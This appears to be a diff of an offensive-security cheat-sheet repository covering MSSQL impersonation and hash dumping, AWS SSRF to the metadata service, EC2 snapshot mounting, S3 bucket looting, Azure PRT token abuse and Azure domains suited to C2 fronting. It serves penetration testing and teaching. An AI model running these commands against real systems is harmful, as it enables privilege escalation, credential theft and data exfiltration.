||||
|
||||
```sql
|
||||
Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose
|
||||
|
||||
SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases
|
||||
```
|
||||
|
||||
> The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.
|
||||
|
||||
```ps1
|
||||
Invoke-SQLAuditPrivXpDirtree
|
||||
Invoke-SQLUncPathInjection
|
||||
Invoke-SQLAuditPrivXpFileexist
|
||||
```
|
||||
|
||||
|
||||
## Manual SQL Server Queries
|
||||
|
||||
### Query Current User & determine if the user is a sysadmin
|
||||
|
||||
```sql
|
||||
select suser_sname()
|
||||
Select system_user
|
||||
select is_srvrolemember('sysadmin')
|
||||
```
|
||||
|
||||
|
||||
### Current Role
|
||||
|
||||
```sql
|
||||
Select user
|
||||
```
|
||||
|
||||
|
||||
### Current DB
|
||||
|
||||
```sql
|
||||
select db_name()
|
||||
```
|
||||
|
||||
|
||||
### List all tables
|
||||
|
||||
```sql
|
||||
select table_name from information_schema.tables
|
||||
```
|
||||
|
||||
|
||||
### List all databases
|
||||
|
||||
```sql
|
||||
select name from master..sysdatabases
|
||||
```
|
||||
|
||||
|
||||
### All Logins on Server
|
||||
|
||||
```sql
|
||||
Select * from sys.server_principals where type_desc != 'SERVER_ROLE'
|
||||
```
|
||||
|
||||
|
||||
### All Database Users for a Database
|
||||
|
||||
```sql
|
||||
Select * from sys.database_principals where type_desc != 'database_role';
|
||||
```
|
||||
|
||||
|
||||
### List All Sysadmins
|
||||
|
||||
```sql
|
||||
SELECT name,type_desc,is_disabled FROM sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1
|
||||
```
|
||||
|
||||
|
||||
### List All Database Roles
|
||||
|
||||
```sql
|
||||
SELECT DB1.name AS DatabaseRoleName,
|
||||
isnull (DB2.name, 'No members') AS DatabaseUserName
|
||||
FROM sys.database_role_members AS DRM
|
||||
RIGHT OUTER JOIN sys.database_principals AS DB1
|
||||
ON DRM.role_principal_id = DB1.principal_id
|
||||
LEFT OUTER JOIN sys.database_principals AS DB2
|
||||
ON DRM.member_principal_id = DB2.principal_id
|
||||
WHERE DB1.type = 'R'
|
||||
ORDER BY DB1.name;
|
||||
```
|
||||
|
||||
|
||||
### Effective Permissions from the Server
|
||||
|
||||
```sql
|
||||
select * from fn_my_permissions(null, 'server');
|
||||
```
|
||||
|
||||
|
||||
### Effective Permissions from the Database
|
||||
|
||||
```sql
|
||||
SELECT * FROM fn_dp1my_permissions(NULL, 'DATABASE');
|
||||
```
|
||||
|
||||
|
||||
### Find SQL Server Logins Which can be Impersonated for the Current Database
|
||||
|
||||
```sql
|
||||
select distinct b.name
|
||||
from sys.server_permissions a
|
||||
inner join sys.server_principals b
|
||||
on a.grantor_principal_id = b.principal_id
|
||||
where a.permission_name = 'impersonate'
|
||||
```
|
||||
|
||||
|
||||
### Exploiting Impersonation
|
||||
|
||||
```sql
|
||||
SELECT SYSTEM_USER
|
||||
SELECT IS_SRVROLEMEMBER('sysadmin')
|
||||
EXECUTE AS LOGIN = 'adminuser'
|
||||
SELECT SYSTEM_USER
|
||||
SELECT IS_SRVROLEMEMBER('sysadmin')
|
||||
SELECT ORIGINAL_LOGIN()
|
||||
```
|
||||
|
||||
|
||||
### Exploiting Nested Impersonation
|
||||
|
||||
```sql
|
||||
SELECT SYSTEM_USER
|
||||
SELECT IS_SRVROLEMEMBER('sysadmin')
|
||||
EXECUTE AS LOGIN = 'stduser'
|
||||
SELECT SYSTEM_USER
|
||||
EXECUTE AS LOGIN = 'sa'
|
||||
SELECT IS_SRVROLEMEMBER('sysadmin')
|
||||
SELECT ORIGINAL_LOGIN()
|
||||
SELECT SYSTEM_USER
|
||||
```
|
||||
|
||||
|
||||
### MSSQL Accounts and Hashes
|
||||
|
||||
```sql
|
||||
MSSQL 2000:
|
||||
SELECT name, password FROM master..sysxlogins
|
||||
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
|
||||
|
||||
MSSQL 2005
|
||||
SELECT name, password_hash FROM master.sys.sql_logins
|
||||
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
|
||||
```
|
||||
|
||||
Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force`
|
||||
|
||||
```ps1
|
||||
131 MSSQL (2000) 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
|
||||
132 MSSQL (2005) 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
|
||||
1731 MSSQL (2012, 2014) 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)
|
||||
* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet)
|
||||
* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/)
|
||||
* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution)
|
|
@ -73,6 +73,31 @@ aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west
|
|||
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
||||
|
||||
|
||||
## Access Snapshots
|
||||
|
||||
1. Get the `owner-id`
|
||||
```powershell
|
||||
$ aws --profile flaws sts get-caller-identity
|
||||
"Account": "XXXX26262029",
|
||||
```
|
||||
2. List snapshots
|
||||
```powershell
|
||||
$ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
|
||||
"SnapshotId": "snap-XXXX342abd1bdcb89",
|
||||
```
|
||||
3. Create a volume using the previously obtained `snapshotId`
|
||||
```powershell
|
||||
$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89
|
||||
```
|
||||
4. In AWS console, deploy a new EC2 Ubuntu based, attach the volume and then mount it on the machine.
|
||||
```ps1
|
||||
$ ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
|
||||
$ lsblk
|
||||
$ sudo file -s /dev/xvda1
|
||||
$ sudo mount /dev/xvda1 /mnt
|
||||
```
|
||||
|
||||
|
||||
## Instance Connect
|
||||
|
||||
Push an SSH key to EC2 instance
|
||||
|
|
|
@ -15,9 +15,9 @@ curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta
|
|||
|
||||
## Method for Elastic Cloud Compute (EC2)
|
||||
|
||||
Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
|
||||
Amazon provides an internal service that allows every EC2 instance to query and retrieve metadata about the host. If you discover an SSRF vulnerability running on an EC2 instance, try to fetch the content from 169.254.169.254.
|
||||
|
||||
1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/
|
||||
1. Access the IAM : [http://169.254.169.254/latest/meta-data/](http://169.254.169.254/latest/meta-data/)
|
||||
```powershell
|
||||
ami-id
|
||||
ami-launch-index
|
||||
|
@ -30,8 +30,8 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me
|
|||
instance-action
|
||||
instance-id
|
||||
```
|
||||
2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
||||
3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
|
||||
2. Find the name of the role assigned to the instance : [http://169.254.169.254/latest/meta-data/iam/security-credentials/](http://169.254.169.254/latest/meta-data/iam/security-credentials/)
|
||||
3. Extract the role's temporary keys : [http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM_USER_ROLE_HERE>/](http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM_USER_ROLE_HERE>/)
|
||||
```powershell
|
||||
{
|
||||
"Code" : "Success",
|
||||
|
@ -69,7 +69,7 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me
|
|||
|
||||
## AWS API calls that return credentials
|
||||
|
||||
- chime:createapikey
|
||||
- [chime:createapikey](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonchime.html)
|
||||
- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html)
|
||||
- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html)
|
||||
- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html)
|
||||
|
|
|
@ -1,7 +1,13 @@
|
|||
# AWS - Service - S3 Buckets
|
||||
|
||||
An AWS S3 bucket is a cloud-based storage container that holds files, known as objects, which can be accessed over the internet. It is highly scalable and can store large amounts of data, such as documents, images, and backups. S3 provides robust security through access control, encryption, and permissions management. It ensures high durability and availability, making it ideal for storing and retrieving data from anywhere.
|
||||
|
||||
## Tools
|
||||
|
||||
* [aws/aws-cli](https://github.com/aws/aws-cli) - Universal Command Line Interface for Amazon Web Services
|
||||
```ps1
|
||||
sudo apt install awscli
|
||||
```
|
||||
* [digi.ninja/bucket-finder](https://digi.ninja/projects/bucket_finder.php) - Search for public buckets, list and download all files if directory indexing is enabled
|
||||
```powershell
|
||||
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
|
||||
|
@ -10,7 +16,6 @@
|
|||
./bucket_finder.rb --download --region ie my_words
|
||||
./bucket_finder.rb --log-file bucket.out my_words
|
||||
```
|
||||
|
||||
* [aws-sdk/boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) - Amazon Web Services (AWS) SDK for Python
|
||||
```python
|
||||
import boto3
|
||||
|
@ -22,7 +27,6 @@
|
|||
except Exception as e:
|
||||
print(e)
|
||||
```
|
||||
|
||||
* [nccgroup/s3_objects_check](https://github.com/nccgroup/s3_objects_check) - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files
|
||||
```powershell
|
||||
$ python3 -m venv env && source env/bin/activate
|
||||
|
@ -30,14 +34,107 @@
|
|||
$ python s3-objects-check.py -h
|
||||
$ python s3-objects-check.py -p whitebox-profile -e blackbox-profile
|
||||
```
|
||||
|
||||
* [grayhatwarfare/buckets](https://buckets.grayhatwarfare.com/) - Search Public Buckets
|
||||
|
||||
|
||||
##
|
||||
## Credentials and Profiles
|
||||
|
||||
Create a profile with your `AWSAccessKeyId` and `AWSSecretKey`, then you can use `--profile nameofprofile` in the `aws` command.
|
||||
|
||||
```js
|
||||
aws configure --profile nameofprofile
|
||||
AWS Access Key ID [None]: <AWSAccessKeyId>
|
||||
AWS Secret Access Key [None]: <AWSSecretKey>
|
||||
Default region name [None]:
|
||||
Default output format [None]:
|
||||
```
|
||||
|
||||
Alternatively you can use environment variables instead of creating a profile.
|
||||
|
||||
```bash
|
||||
export AWS_ACCESS_KEY_ID=ASIAZ[...]PODP56
|
||||
export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ
|
||||
export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU=
|
||||
```
|
||||
|
||||
|
||||
## Open S3 Bucket
|
||||
|
||||
An open S3 bucket refers to an Amazon Simple Storage Service (Amazon S3) bucket that has been configured to allow public access, either intentionally or by mistake. This means that anyone on the internet could potentially access, read, or even modify the data stored in the bucket, depending on the permissions set.
|
||||
|
||||
* [http://s3.amazonaws.com/<bucket-name>/](http://s3.amazonaws.com/<bucket-name>/)
|
||||
* [http://<bucket-name>.s3.amazonaws.com/](http://<bucket-name>.s3.amazonaws.com/)
|
||||
|
||||
AWS S3 buckets name examples: [http://flaws.cloud.s3.amazonaws.com](http://flaws.cloud.s3.amazonaws.com).
|
||||
|
||||
Either bruteforce the buckets name with keyword related to your target or search through the leaked one using OSINT tool such as [buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/).
|
||||
|
||||
When file listing is enabled, the name is also displayed inside the `<Name>` XML tag.
|
||||
|
||||
```xml
|
||||
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
|
||||
<Name>adobe-REDACTED-REDACTED-REDACTED</Name>
|
||||
```
|
||||
|
||||
|
||||
## Bucket Interations
|
||||
|
||||
### Find the Region
|
||||
|
||||
To find the region of an Amazon Web Services (AWS) service (such as an S3 bucket) using dig or nslookup, query the DNS records for the service's domain or endpoint.
|
||||
|
||||
```bash
|
||||
$ dig flaws.cloud
|
||||
;; ANSWER SECTION:
|
||||
flaws.cloud. 5 IN A 52.218.192.11
|
||||
|
||||
$ nslookup 52.218.192.11
|
||||
Non-authoritative answer:
|
||||
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
|
||||
```
|
||||
|
||||
|
||||
### List Files
|
||||
|
||||
To list files in an AWS S3 bucket using the AWS CLI, you can use the following command:
|
||||
|
||||
```bash
|
||||
aws s3 ls <target> [--options]
|
||||
aws s3 ls s3://bucket-name --no-sign-request --region <insert-region-here>
|
||||
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
|
||||
```
|
||||
|
||||
|
||||
### Copy, Upload and Download Files
|
||||
|
||||
* Copy
|
||||
```bash
|
||||
aws s3 cp <source> <target> [--options]
|
||||
aws s3 cp local.txt s3://bucket-name/remote.txt --acl authenticated-read
|
||||
aws s3 cp login.html s3://bucket-name --grants read=uri=http://acs.amazonaws.com/groups/global/AllUsers
|
||||
```
|
||||
|
||||
* Upload
|
||||
```bash
|
||||
aws s3 mv <source> <target> [--options]
|
||||
aws s3 mv test.txt s3://hackerone.files
|
||||
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
|
||||
```
|
||||
|
||||
* Download
|
||||
```bash
|
||||
aws s3 sync <source> <target> [--options]
|
||||
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* []()
|
||||
* [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets)
|
||||
* [Bug Bounty Survey - AWS Basic test](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
|
||||
* [flaws.cloud Challenge based on AWS vulnerabilities - Scott Piper - Summit Route](http://flaws.cloud/)
|
||||
* [flaws2.cloud Challenge based on AWS vulnerabilities - Scott Piper - Summit Route](http://flaws2.cloud)
|
||||
* [Guardzilla video camera hardcoded AWS credential - INIT_6 - December 27, 2018](https://blackmarble.sh/guardzilla-video-camera-hard-coded-aws-credentials/)
|
||||
* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
|
||||
* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
|
||||
* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf)
|
|
@ -0,0 +1,103 @@
|
|||
# aka.ms Shortcuts
|
||||
|
||||
aka.ms is a URL shortening service used by Microsoft. It is commonly employed to create short, easily shareable links that redirect users to longer or more complex URLs, typically related to Microsoft services, products, or resources.
|
||||
|
||||
## Azure Active Directory - Admins
|
||||
|
||||
|aka.ms|Command|Portal Blade|
|
||||
|-----|----|---|
|
||||
|[aka.ms/ad/ca](https://aka.ms/ad/ca)|ca|Conditional Access|
|
||||
|[aka.ms/ad/cawhatif](https://aka.ms/ad/cawhatif)|cawhatif|Conditional Access What If|
|
||||
|[aka.ms/ad/pim](https://aka.ms/ad/pim)|pim|Privileged Identity Management|
|
||||
|[aka.ms/ad/users](https://aka.ms/ad/users)|users|Users|
|
||||
|[aka.ms/ad/groups](https://aka.ms/ad/groups)|groups|Groups|
|
||||
|[aka.ms/ad/devices](https://aka.ms/ad/devices)|devices|Devices|
|
||||
|[aka.ms/ad/apps](https://aka.ms/ad/apps)|apps|Enterprise Applications|
|
||||
|[aka.ms/ad/appreg](https://aka.ms/ad/appreg)|appreg|Application Registrations|
|
||||
|[aka.ms/ad/auth](https://aka.ms/ad/auth)|auth|Authentication Methods Policies|
|
||||
|[aka.ms/ad/legacymfa](https://aka.ms/ad/legacymfa)|legacymfa|Legacy MFA|
|
||||
|[aka.ms/ad/guests](https://aka.ms/ad/guests)|guests|Guest Access Settings|
|
||||
|[aka.ms/ad/logs](https://aka.ms/ad/logs)|logs|Sign in Logs|
|
||||
|[aka.ms/ad/xtap](https://aka.ms/ad/xtap)|xtap|Cross Tenant Access Settings|
|
||||
|[aka.ms/ad/roles](https://aka.ms/ad/roles)|roles|Azure AD Roles|
|
||||
|[aka.ms/ad/sspr](https://aka.ms/ad/sspr)|sspr|Password Reset|
|
||||
|[aka.ms/ad/security](https://aka.ms/ad/security)|security|Security|
|
||||
|[aka.ms/ad/mfaunblock](https://aka.ms/ad/mfaunblock)|mfaunblock|MFA Unblock|
|
||||
|[aka.ms/ad/reviews](https://aka.ms/ad/reviews)|reviews|Access Reviews|
|
||||
|[aka.ms/ad/score](https://aka.ms/ad/score)|score|Secure Score|
|
||||
|[aka.ms/ad/license](https://aka.ms/ad/license)|license|Licenses|
|
||||
|[aka.ms/ad/synclog](https://aka.ms/ad/synclog)|synclog|AAD Connect Sync Errors|
|
||||
|[aka.ms/ad/adfslog](https://aka.ms/ad/adfslog)|adfslog|ADFS Log|
|
||||
|[aka.ms/ad/consent](https://aka.ms/ad/consent)|consent|Consents and Permissions|
|
||||
|[aka.ms/ad/support](https://aka.ms/ad/support)|support|Support|
|
||||
|[aka.ms/ad/list](https://aka.ms/ad/list)|list|List all these shortcuts|
|
||||
|
||||
## Microsoft Admin Portals
|
||||
|
||||
|aka.ms|Command|Page|
|
||||
|-----|----|---|
|
||||
|[aka.ms/admin](https://aka.ms/admin)|admin|[M365 Admin Portal](https://admin.microsoft.com)|
|
||||
|[aka.ms/azad](https://aka.ms/azad)|azad|[Azure AD Portal](https://portal.azure.com)|
|
||||
|[aka.ms/ge](https://aka.ms/ge)|ge|[Graph Explorer](https://developer.microsoft.com/graph/graph-explorer)|
|
||||
|[aka.ms/intune](https://aka.ms/intune)|intune|[Intune](https://endpoint.microsoft.com)|
|
||||
|[aka.ms/ppac](https://aka.ms/ppac)|ppac|[Power Platform](https://admin.powerplatform.microsoft.com/)|
|
||||
|
||||
## Microsoft Intune Portals
|
||||
|
||||
|aka.ms|Command|Page|
|
||||
|-----|----|---|
|
||||
|[aka.ms/in](https://aka.ms/in)|in|Intune admin center|
|
||||
|[aka.ms/intuneshd](https://aka.ms/intuneshd)|intuneshd|Intune service health|
|
||||
|[aka.ms/intunesupport](https://aka.ms/intunesupport)|support|Get Intune Support|
|
||||
|[aka.ms/enrollmymac](https://aka.ms/enrollmymac)|enrollmymac|Download the Intune Company Portal for Macs|
|
||||
|
||||
## Microsoft 365 Defender
|
||||
|
||||
|aka.ms|Command|Portal Blade|
|
||||
|-----|----|---|
|
||||
|[aka.ms/de](https://aka.ms/de)|de|Microsoft 365 Defender|
|
||||
|[aka.ms/de/incidents](https://aka.ms/de/incidents)|incidents|Incidents|
|
||||
|[aka.ms/de/hunting](https://aka.ms/de/hunting)|hunting|Hunting|
|
||||
|[aka.ms/de/actions](https://aka.ms/de/actions)|actions|Action Center|
|
||||
|[aka.ms/de/explorer](https://aka.ms/de/explorer)|explorer|Explorer|
|
||||
|
||||
## Microsoft User Portals
|
||||
|
||||
|aka.ms|Page|
|
||||
|-----|---|
|
||||
|[aka.ms/sspr](https://aka.ms/sspr)|Self Service Password Reset|
|
||||
|[aka.ms/mysecurity](https://aka.ms/mysecurity)|My Security|
|
||||
|[aka.ms/myapps](https://aka.ms/myapps)|My Apps|
|
||||
|[aka.ms/my-account](https://aka.ms/my-account)|My Account|
|
||||
|[aka.ms/my-groups](https://aka.ms/my-groups)|My Groups|
|
||||
|[aka.ms/my-access](https://aka.ms/my-access)|My Access Packages|
|
||||
|[aka.ms/mystaff](https://aka.ms/mystaff)|My Access Packages|
|
||||
|[aka.ms/mfasetup](https://aka.ms/mfasetup)|Alternative for My Security|
|
||||
|
||||
## Identity Protection
|
||||
|
||||
|aka.ms|Page|
|
||||
|-----|---|
|
||||
|[aka.ms/identityprotection](https://aka.ms/identityprotection)|Identity Protection|
|
||||
|
||||
## Winget (Windows Package Manager)
|
||||
|
||||
|aka.ms|Page|
|
||||
|-----|---|
|
||||
|[aka.ms/getwinget](https://aka.ms/getwinget)|Get Winget Installer|
|
||||
|[aka.ms/winget-docs](https://aka.ms/winget-docs)|Winget Documentation|
|
||||
|[aka.ms/winget](https://aka.ms/winget)|Winget Packages (Github Repo)|
|
||||
|
||||
## Miscellaneous
|
||||
|
||||
|aka.ms|Page|
|
||||
|-----|---|
|
||||
|[aka.ms/entradeprecations](https://aka.ms/entradeprecations)|Entra/Azure AD related retirements/deprecations|
|
||||
|[aka.ms/entratemplates](https://aka.ms/entratemplates)|Email templates & posters to roll out Azure Active Directory features|
|
||||
|[aka.ms/Fileshare Migration](https://aka.ms/odsp-mm-fs)|Fileshare Migration Portal|
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [microsoft/aka - GitHub - microsoftopensource](https://github.com/microsoft/aka)
|
||||
* [levid0s/AzurePortals - levid0s - 2019](https://github.com/levid0s/AzurePortals)
|
|
@ -1,4 +1,4 @@
|
|||
# Azure AD - Tokens
|
||||
# Azure AD - Access and Tokens
|
||||
|
||||
## Connection
|
||||
|
||||
|
@ -322,7 +322,7 @@ MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joine
|
|||
* Request a nonce from AAD: `roadrecon auth --prt-init -t <tenant-id>`
|
||||
* Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof) to initiate a new PRT request.
|
||||
* `roadrecon auth --prt-cookie <prt-cookie> --tokens-stdout --debug` or `roadtx gettoken --prt-cookie <x-ms-refreshtokencredential>`
|
||||
* Then browse to [login.microsoftonline.com](login.microsoftonline.com) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>`
|
||||
* Then browse to [login.microsoftonline.com](https://login.microsoftonline.com) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>`
|
||||
```powershell
|
||||
Name: x-ms-RefreshTokenCredential
|
||||
Value: <Signed JWT>
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Azure AD - Azure AD Connect
|
||||
# Azure AD - AD Connect and Cloud Sync
|
||||
|
||||
| Active Directory | Azure AD |
|
||||
|-----------------------------------|-------------------|
|
||||
|
|
|
@ -30,7 +30,6 @@ Subscriptions:
|
|||
* **Core Domain**: The initial domain name <tenant>.onmicrosoft.com is the core domain. It is possible to define custom domain names too.
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Az - Permissions for a Pentest - HackTricks](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-permissions-for-a-pentest)
|
||||
|
|
|
@ -6,6 +6,7 @@
|
|||
az webapp list
|
||||
```
|
||||
|
||||
|
||||
## Execute Commands
|
||||
|
||||
```ps1
|
||||
|
@ -19,6 +20,7 @@ Invoke-AzureRMWebAppShellCommand `
|
|||
-Command "whoami"
|
||||
```
|
||||
|
||||
|
||||
## SSH Connection
|
||||
|
||||
First check if the SSH over HTTP connection is enabled: `(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode`
|
||||
|
@ -29,6 +31,25 @@ az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-g
|
|||
```
|
||||
|
||||
|
||||
## Kudu
|
||||
|
||||
In Azure App Service, Kudu is the advanced management and deployment tool used for various operations such as continuous integration, troubleshooting, and diagnostic tasks for your web applications. It provides a set of utilities and features for managing your app’s environment, including access to application settings, log streams, and deployment management.
|
||||
|
||||
You can access this Kudu app at the following URLs:
|
||||
|
||||
* App not in the Isolated tier: `https://<app-name>.scm.azurewebsites.net`
|
||||
* Internet-facing app in the Isolated tier (App Service Environment): `https://<app-name>.scm.<ase-name>.p.azurewebsites.net`
|
||||
* Internal app in the Isolated tier (App Service Environment for internal load balancing): `https://<app-name>.scm.<ase-name>.appserviceenvironment.net`
|
||||
|
||||
Key Features of Kudu in App Service:
|
||||
|
||||
* **Web-Based Console**: Provides a command-line interface (CLI) to execute commands directly on the App Service environment.
|
||||
* **File Explorer**: Lets you view and manage files in your app’s environment.
|
||||
* **Environment Diagnostics**: Offers insights into the environment variables, app settings, and detailed diagnostic logs.
|
||||
* **Process Explorer**: Allows you to monitor and manage running processes in your app’s environment.
|
||||
* **Access to Logs**: Easily view, download, and stream logs for debugging and troubleshooting.
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
|
|
@ -0,0 +1,40 @@
|
|||
# Azure Services - DNS Suffix
|
||||
|
||||
## DNS table
|
||||
|
||||
Many Azure services generate custom endpoints with a suffix such as `.cloudapp.azure.com`, `.windows.net`. Below is a table of common services and their associated DNS suffixes.
|
||||
|
||||
These services can also be leveraged for domain fronting or communication with an external C2 server when they are whitelisted by the proxy or the firewall rules.
|
||||
|
||||
| Service | Domain |
|
||||
| --- | --- |
|
||||
| Analysis Services Suffix | .asazure.windows.net |
|
||||
| API Management Suffix | .azure-api.net |
|
||||
| App Services Suffix | .azurewebsites.net |
|
||||
| Automation Suffix | .azure-automation.net |
|
||||
| Batch Suffix | .batch.azure.com |
|
||||
| Blob Endpoint Suffix | .blob.core.windows.net |
|
||||
| CDN Suffix | .azureedge.net |
|
||||
| Data Lake Analytics Catalog Suffix | .azuredatalakeanalytics.net |
|
||||
| Data Lake Store Suffix | .azuredatalakestore.net |
|
||||
| DocumentDB/CosmosDB Suffix | .documents.azure.com |
|
||||
| Event Hubs Suffix | .servicesbus.windows.net |
|
||||
| File Endpoint Suffix | .file.core.windows.net |
|
||||
| FrontDoor Suffix | .azurefd.net |
|
||||
| IoT Hub Suffix | .azure-devices.net |
|
||||
| Key Vault Suffix | .vault.azure.net |
|
||||
| Logic App Suffix | .azurewebsites.net |
|
||||
| Queue Endpoint Suffix | .queue.core.windows.net |
|
||||
| Redis Cache Suffix | .redis.cache.windows.net |
|
||||
| Service Bus Suffix | .servicesbus.windows.net |
|
||||
| Service Fabric Suffix | .cloudapp.azure.com |
|
||||
| SQL Database Suffix | .database.windows.net |
|
||||
| Storage Endpoint Suffix | .core.windows.net |
|
||||
| Table Endpoint Suffix | .table.core.windows.net |
|
||||
| Traffic Manager Suffix | .trafficmanager.net |
|
||||
| Web Application Gateway Suffix | .cloudapp.azure.com |
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Azure services URLs and IP addresses for firewall or proxy whitelisting - Daniel Neumann - 20. December 2016](https://www.danielstechblog.io/azure-services-urls-and-ip-addresses-for-firewall-or-proxy-whitelisting/)
|
|
@ -0,0 +1,77 @@
|
|||
# MSSQL - Audit Checks
|
||||
|
||||
## Summary
|
||||
|
||||
* [Find and exploit impersonation opportunities ](#find-and-exploit-impersonation-opportunities)
|
||||
* [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
|
||||
* [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy)
|
||||
|
||||
|
||||
## Find and exploit impersonation opportunities
|
||||
|
||||
* Impersonate as: `EXECUTE AS LOGIN = 'sa'`
|
||||
* Impersonate `dbo` with DB_OWNER
|
||||
```sql
|
||||
SQL> select is_member('db_owner');
|
||||
SQL> execute as user = 'dbo'
|
||||
SQL> SELECT is_srvrolemember('sysadmin')
|
||||
```
|
||||
|
||||
```ps1
|
||||
Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose
|
||||
|
||||
# impersonate sa account
|
||||
powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS LOGIN = 'sa'; SELECT IS_SRVROLEMEMBER(''sysadmin'')" -Verbose -Debug
|
||||
```
|
||||
|
||||
### Exploiting Impersonation
|
||||
|
||||
```sql
|
||||
SELECT SYSTEM_USER
|
||||
SELECT IS_SRVROLEMEMBER('sysadmin')
|
||||
EXECUTE AS LOGIN = 'adminuser'
|
||||
SELECT SYSTEM_USER
|
||||
SELECT IS_SRVROLEMEMBER('sysadmin')
|
||||
SELECT ORIGINAL_LOGIN()
|
||||
```
|
||||
|
||||
### Exploiting Nested Impersonation
|
||||
|
